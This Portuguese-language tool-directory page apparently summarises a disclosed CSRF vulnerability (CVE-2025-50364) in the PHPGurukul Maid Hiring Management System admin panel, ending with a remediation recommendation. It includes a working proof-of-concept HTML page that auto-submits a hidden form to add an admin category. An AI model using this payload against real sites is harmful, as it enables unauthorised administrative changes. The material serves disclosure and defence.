Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Prova de conceito de exploração de CSRF visando CVE-2025-50364 no PHPGurukul Maid Hiring Management System v1.0 que adiciona categorias de administrador arbitrárias por meio de um formulário HTML elaborado.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Nome do Projeto e URL do Repositório: Sistema de Gestão de Contratação de Empregadas Domésticas usando PHP e MySQL

Tipo de Vulnerabilidade: Client Side Request Forgery

Versão(ões) Afetada(s): v1.0

💣Descrição da Vulnerabilidade: Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no painel de administração do PHPGurukul Hiring Management System, permitindo que um atacante adicione categorias de contratação arbitrárias ao enganar um administrador autenticado para visitar um site malicioso. Isso pode levar à poluição de dados e alterações não autorizadas em nível de administrador.

👩‍💻Impacto: Criação não autorizada de categorias

🛜Prova de Conceito (PoC)

  1. Existe uma funcionalidade de adicionar categoria onde apenas administradores autenticados podem adicionar categoria. 1
  2. Código HTML para enviar uma requisição POST para o endpoint /admin/add-category.php CSRF-POC 2
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Use o código HTML e crie uma URL maliciosa. 3
  2. Após o administrador clicar no link, uma nova categoria será adicionada. 4 5

Recomendação: Implementar tokens CSRF em formulários de administração, reforçar cookies SameSite e validar a origem da requisição para evitar ações não autorizadas.

Baixar ferramenta